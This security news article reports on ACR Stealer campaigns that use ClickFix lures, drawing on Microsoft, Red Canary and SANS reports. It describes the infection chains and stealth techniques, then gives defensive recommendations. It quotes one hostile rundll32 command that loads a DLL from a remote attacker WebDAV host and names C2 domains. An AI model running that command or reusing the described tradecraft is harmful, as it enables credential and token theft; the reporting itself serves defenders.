ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

ACR Stealer, an infostealer in circulation since 2024, is walking out of enterprise networks with saved browser passwords, live session tokens, PDFs, Microsoft 365 documents, and files from synced OneDrive and SharePoint folders.

ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files

ACR Stealer, an infostealer in circulation since 2024, is walking out of enterprise networks with saved browser passwords, live session tokens, PDFs, Microsoft 365 documents, and files from synced OneDrive and SharePoint folders.

It gets in because someone pasted a command into a Run box and pressed Enter. Microsoft laid out two of the delivery chains on Thursday. Its Defender Experts team, the company’s managed detection arm, had watched ACR Stealer activity climb across customer environments from late April to mid-June, and says the campaigns are “successfully using ClickFix lures to steal browser credentials, authentication tokens, and sensitive documents.”

Both chains open with the same prompt, then split: one leaves traces on disk, the other runs almost entirely in memory. Microsoft’s remediation guidance tells victims to revoke tokens, not just rotate passwords.

A payload in the pixels

The prompt likely arrives through malvertising or SEO-manipulated search results, the report says. The fileless chain starts when the pasted command spawns mshta.exe to pull remote HTA content. An embedded VBScript loader leans on COM objects to decode and fire PowerShell; that stage mints a victim ID, disables certificate validation, and runs what it retrieves in memory.

What it retrieves is a JPEG from an image host, with the payload sitting in the pixels. Custom routines carve it out, decrypt it, decompress it, and execute it reflectively. Then it goes for Chrome and Edge, reading the Login Data and Web Data databases and invoking DPAPI to decrypt the passwords, cookies, and tokens they hold. The PDFs on the Desktop and in Downloads go too.

On May 26, SANS Internet Storm Center handler Brad Duncan documented a Windows infection he traced to a page impersonating Claude, Anthropic’s AI assistant, reached through malicious Google ads and often hidden behind sites.google.com URLs. The page served macOS instructions when opened on a Mac and Windows instructions when opened on Windows.

Microsoft never names the lure. Two of the indicators in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc, are listed as a payload host and a C2. The Hacker News matched both to Duncan’s chain, which ran through subdomains of each seven weeks earlier, and Microsoft’s report cites his diary among the references.

That chain also pulled a 628 KB JPEG from ImgBB, an image-hosting service. He flagged it as part of the infection and got nothing out of it: “nor could I find any obvious signs of embedded data.”

Red Canary had logged Claude-branded lures a month earlier, delivering ACR Stealer through fake Claude Code pages on GitLab such as claude-desktop[.]gitlab[.]io.

The other chain leaves fingerprints

Microsoft’s first chain writes to disk, which leaves defenders more to work with. The pasted command pulls a DLL straight off a WebDAV share over HTTPS, using a GUID directory and a filename built to pass as something else; the report’s example is google.ct.

Red Canary published the same shape in its May report, from April telemetry, weeks before Microsoft’s writeup:

"C:Windowssystem32rundll32.exe" \sphere-api.dialectosphere.in[.]net5fe317c-0981-4de2-bc8a-930d369db441ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Two of the three variants Defender Experts saw use pushd to mount the remote share as a temporary local drive first, so the payload runs through what looks like a local path. The stealthiest wraps that in conhost.exe --headless to kill the console window and hides the strings for pushd, rundll32, and the remote host behind delayed environment-variable expansion.

What follows is obfuscated PowerShell. It drops a ZIP into a folder under %LocalAppData%Temp with an innocuous name; Microsoft’s example is LogiOptionsPlus. A bundled pythonw.exe then launches the Python script, so nothing flashes on screen. The installer wipes older copies before installing, which makes it an updater.

It persists through a hidden scheduled task posing as a software update, copies timestamps off notepad.exe onto its own files, and clears PowerShell history behind it. The last stage stays in memory, handing execution through the Windows Fiber API.

In a subset of these intrusions, a second Python loader talks to public blockchain RPC endpoints and Web3 node infrastructure, likely pulling a payload or a C2 address off a public ledger. Microsoft names the technique EtherHiding: put the pointer in a smart contract, and there is no attacker-controlled resolver left to seize.

No bug, no numbers

Neither chain exploits a vulnerability. Both inherit exactly what the signed-in user already has, and every layer downstream, the WebDAV mount, the pixel extraction, the in-memory handoff, only runs because a person read a prompt and pressed Enter. There is no CVE in this story. Patching does not remove the paste-and-run path.

Microsoft says the lures are working, but never quantifies it. The report gives no victim count, no number of affected customers, and no baseline for the increase it reports.

Red Canary’s April telemetry at least has numbers. ClearFake, a web-inject cluster that has been feeding ACR Stealer since at least March 2025, took the No. 1 spot on its most-prevalent-threat list for the first time that month, and ACR Stealer entered the top ten at a tie for sixth.

The cluster delivers through JavaScript injected into compromised sites, and Microsoft’s report does not mention it in either chain.

Whose stealer is this?

Microsoft is careful about what it claims. It ties the activity to ACR Stealer on observed behavior and post-exploitation tradecraft, checked against what is publicly known about the family’s infrastructure, and names no threat actor at all. The caution is earned.

ACR, also written up as AcridRain, was marketed on Russian-speaking forums by an actor known as SheldIO, who shut down sales in July 2024. The accounts split on what happened next. eSentire says the source code was sold off. Proofpoint’s account differs: the same Telegram channel called the shutdown, not a goodbye from the team, and the Amatera panel surfaced five months later.

On the rebrand, they agree. Proofpoint reported in June 2025 that “ACR Stealer was significantly updated and rebranded as Amatera Stealer,” priced from $199 a month to $1,499 a year. Red Canary treats ACR and Amatera as one family and assesses ACR itself as an updated GrMsk Stealer.

A July 2026 detection labelled ACR Stealer is a behavioral call on a codebase that has been renamed at least once and may have changed owners. The label describes the code. It does not tell you who is running it.

Where to stop it

One control sits upstream of every technique above: neither chain runs without a user pasting a command into the Run dialog.

  • Cut the vector. eSentire recommends removing the Run prompt via GPO and blocking mshta.exe through AppLocker or WDAC.
  • Use application control and attack surface reduction rules so PowerShell, Python, mshta.exe, and rundll32.exe cannot launch internet-delivered content from Downloads, Temp, or %LocalAppData%.
  • Hunt rundll32.exe running with no command-line parameters while making a network connection, which is Red Canary’s detection opportunity for this family. Add scheduled tasks masquerading as software updates, timestomping, and PowerShell history clearing.
  • On a suspected host, isolate, rotate credentials, revoke tokens, and check outbound connections to remote shares and image-hosting services.

Microsoft shipped three Defender XDR hunting queries and 16 campaign domains with the report.

Those indicators are a slice, and the report says so: representative, not the family’s full range, with more campaigns and infrastructure likely active. Domains rotate. The ask at the front does not, because it works. The lures overlap rather than replace one another: Red Canary saw fake CAPTCHAs and fake Claude pages in the same April telemetry.

About Author

What do you feel about this?

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.